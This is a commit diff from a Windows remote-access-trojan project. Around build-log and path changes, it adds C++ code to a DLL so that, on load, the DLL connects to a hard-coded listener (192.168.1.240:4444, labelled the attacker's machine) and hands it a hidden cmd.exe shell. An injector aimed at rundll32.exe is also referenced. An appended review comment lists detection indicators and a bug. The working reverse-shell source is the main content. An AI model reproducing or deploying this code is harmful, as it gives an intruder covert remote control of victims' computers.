Improved some stuff, cleaned some stuff. Now, after executing the loader, the DLL creates a reverse shell to a specified server.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,13 +0,0 @@
|
|||||||
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
|
|
||||||
c:\users\hellisabove\source\repos\rat\debug\dll.lib
|
|
||||||
c:\users\hellisabove\source\repos\rat\debug\dll.exp
|
|
||||||
c:\users\hellisabove\source\repos\rat\debug\dll.dll
|
|
||||||
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
|
|
||||||
+4
-5
@@ -1,10 +1,9 @@
|
|||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
|
|
||||||
fundll.cpp
|
fundll.cpp
|
||||||
tools.cpp
|
Creating library C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.exp
|
||||||
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
|
|
||||||
Generating code
|
Generating code
|
||||||
c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
|
c:\users\hellisabove\source\repos\winapi-rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
|
||||||
|
c:\users\hellisabove\source\repos\winapi-rat\dll\fundll.cpp(44): warning C4700: uninitialized local variable 'dll_param' used
|
||||||
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||||
Finished generating code
|
Finished generating code
|
||||||
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
|
Dll.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.dll
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +0,0 @@
|
|||||||
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
|
||||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
|
||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,16 +1,16 @@
|
|||||||
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\vc141.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\tools.obj
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.obj
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.lib
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.lib
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.exp
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.exp
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.ipdb
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.iobj
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.dll
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.dll
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.write.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.write.1.tlog
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
|
|||||||
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
||||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+42
-25
@@ -1,42 +1,59 @@
|
|||||||
|
#include <winsock2.h>
|
||||||
|
#include <stdio.h>
|
||||||
#include "tools.h"
|
#include "tools.h"
|
||||||
BOOL was_dllmain_called = FALSE;
|
#pragma comment(lib, "ws2_32")
|
||||||
DWORD dll_param;
|
|
||||||
|
|
||||||
LPSTR target_path = "C:\\Windows\\System32\\conhost.exe";
|
int reverse(void) {
|
||||||
|
WSADATA wsaData;
|
||||||
|
SOCKET wSock;
|
||||||
|
struct sockaddr_in sock;
|
||||||
|
STARTUPINFO si;
|
||||||
|
PROCESS_INFORMATION pi;
|
||||||
|
|
||||||
|
// listener ip, port on attacker's machine
|
||||||
|
char* ip = "192.168.1.240";
|
||||||
|
short port = 4444;
|
||||||
|
|
||||||
|
// init socket lib
|
||||||
|
WSAStartup(MAKEWORD(2, 2), &wsaData);
|
||||||
|
|
||||||
|
// create socket
|
||||||
|
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
|
||||||
|
|
||||||
|
sock.sin_family = AF_INET;
|
||||||
|
sock.sin_port = htons(port);
|
||||||
|
sock.sin_addr.s_addr = inet_addr(ip);
|
||||||
|
|
||||||
|
// connect to remote host
|
||||||
|
WSAConnect(wSock, (SOCKADDR*)&sock, sizeof(sock), NULL, NULL, NULL, NULL);
|
||||||
|
|
||||||
|
memset(&si, 0, sizeof(si));
|
||||||
|
si.cb = sizeof(si);
|
||||||
|
si.dwFlags = STARTF_USESTDHANDLES;
|
||||||
|
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;
|
||||||
|
|
||||||
|
// start cmd.exe with redirected streams
|
||||||
|
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
|
||||||
|
exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
extern "C" __declspec(dllexport) void FunEntry() {
|
extern "C" __declspec(dllexport) void FunEntry() {
|
||||||
|
LPSTR target_path = "C:\\Windows\\System32\\rundll32.exe";
|
||||||
|
DWORD dll_param;
|
||||||
char dll_path[MAX_PATH];
|
char dll_path[MAX_PATH];
|
||||||
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
|
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
|
||||||
char test[1024];
|
reverse();
|
||||||
wsprintfA(test, "%s", dll_path);
|
|
||||||
MessageBoxA(0, test, "", 0);
|
|
||||||
// inject dll
|
|
||||||
Tools::AutoInject(target_path, dll_path);
|
Tools::AutoInject(target_path, dll_path);
|
||||||
}
|
}
|
||||||
|
|
||||||
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
|
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
|
||||||
dll_param = (DWORD)Base;
|
|
||||||
was_dllmain_called = TRUE;
|
|
||||||
|
|
||||||
switch (Callback) {
|
switch (Callback) {
|
||||||
case DLL_PROCESS_ATTACH:
|
case DLL_PROCESS_ATTACH:
|
||||||
|
FunEntry();
|
||||||
break;
|
case DLL_THREAD_ATTACH:
|
||||||
|
case DLL_THREAD_DETACH:
|
||||||
case DLL_PROCESS_DETACH:
|
case DLL_PROCESS_DETACH:
|
||||||
|
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
return TRUE;
|
return TRUE;
|
||||||
}
|
|
||||||
|
|
||||||
extern "C" __declspec(dllexport) void MainBitch() {
|
|
||||||
if (was_dllmain_called) {
|
|
||||||
while (TRUE) {
|
|
||||||
char exe[MAX_PATH + 1];
|
|
||||||
GetModuleFileNameA(0, exe, sizeof(exe));
|
|
||||||
MessageBoxA(0, exe, "I am inside: ", 0);
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
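Review bot: The description says the DLL connects "to a specified server", but nothing in the new `reverse()` takes a parameter or reads configuration — the listener address `192.168.1.240`, the port `4444` and the command `cmd.exe` are compile-time literals, so the wording should say the endpoint is hard-coded, e.g. a comment above the two assignments: `// listener endpoint is compiled in; there is no runtime configuration`. For anyone triaging this artifact, those same literals together with the `ws2_32` link directive are the static indicators, and the runtime behaviour to look for is a DLL whose `DLL_PROCESS_ATTACH` handler now calls `FunEntry()` → `reverse()`, opens an outbound TCP connection and then starts `cmd.exe` with all three standard handles bound to the socket (`si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock`), which is the pattern that reverse-shell detection rules key on. The build log in this same commit reports C4700 for `dll_param` in `FunEntry`, and the hunk confirms it: the new local `DWORD dll_param;` is passed to `GetModuleFileNameA` without ever being assigned, since the old `dll_param = (DWORD)Base;` in `DllMain` was removed.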
@@ -1,5 +1,4 @@
|
|||||||
#include <Windows.h>
|
#include <Windows.h>
|
||||||
|
|
||||||
#pragma once
|
#pragma once
|
||||||
|
|
||||||
namespace Tools {
|
namespace Tools {
|
||||||
|
|||||||
@@ -1,13 +1,13 @@
|
|||||||
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\vc143.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.idb
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\vc143.idb
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.obj
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.obj
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.ilk
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.ilk
|
||||||
c:\users\hellisabove\source\repos\rat\debug\injector.exe
|
c:\users\hellisabove\source\repos\winapi-rat\debug\injector.exe
|
||||||
c:\users\hellisabove\source\repos\rat\debug\injector.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\debug\injector.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.items.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.items.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.write.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.write.1.tlog
|
||||||
|
|||||||
@@ -2,7 +2,7 @@
|
|||||||
<Project>
|
<Project>
|
||||||
<ProjectOutputs>
|
<ProjectOutputs>
|
||||||
<ProjectOutput>
|
<ProjectOutput>
|
||||||
<FullPath>C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe</FullPath>
|
<FullPath>C:\Users\hellisabove\source\repos\winapi-rat\Debug\Injector.exe</FullPath>
|
||||||
</ProjectOutput>
|
</ProjectOutput>
|
||||||
</ProjectOutputs>
|
</ProjectOutputs>
|
||||||
<ContentFiles />
|
<ContentFiles />
|
||||||
|
|||||||
Binary file not shown.
@@ -1,2 +1,2 @@
|
|||||||
injector.cpp
|
injector.cpp
|
||||||
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
|
Injector.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\Injector.exe
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1 +1 @@
|
|||||||
C:\Users\hellisabove\source\repos\RAT\Injector\injector.cpp;C:\Users\hellisabove\source\repos\RAT\Injector\Debug\injector.obj
|
C:\Users\hellisabove\source\repos\winapi-rat\Injector\injector.cpp;C:\Users\hellisabove\source\repos\winapi-rat\Injector\Debug\injector.obj
|
||||||
|
|||||||
@@ -1,2 +1,2 @@
|
|||||||
PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
|
PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
|
||||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -78,5 +78,5 @@ INT main(INT arg, PCHAR argv[]) {
|
|||||||
CloseHandle(x_file);
|
CloseHandle(x_file);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
printf("\nUSE: %s section name target dll\n",argv[0]);
|
printf("\nUSE: %s 'section name' target dll\n",argv[0]);
|
||||||
}
|
}
|
||||||
@@ -1,11 +1,11 @@
|
|||||||
c:\users\hellisabove\source\repos\rat\loader\debug\vc141.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\vc141.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\tools.obj
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\tools.obj
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.obj
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.obj
|
||||||
c:\users\hellisabove\source\repos\rat\debug\loader.exe
|
c:\users\hellisabove\source\repos\winapi-rat\debug\loader.exe
|
||||||
c:\users\hellisabove\source\repos\rat\debug\loader.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\debug\loader.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.write.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.write.1.tlog
|
||||||
|
|||||||
@@ -1,6 +1,2 @@
|
|||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||||
cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
|
Loader.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\Loader.exe
|
||||||
loader.cpp
|
|
||||||
tools.cpp
|
|
||||||
Generating Code...
|
|
||||||
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
|
|||||||
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
||||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.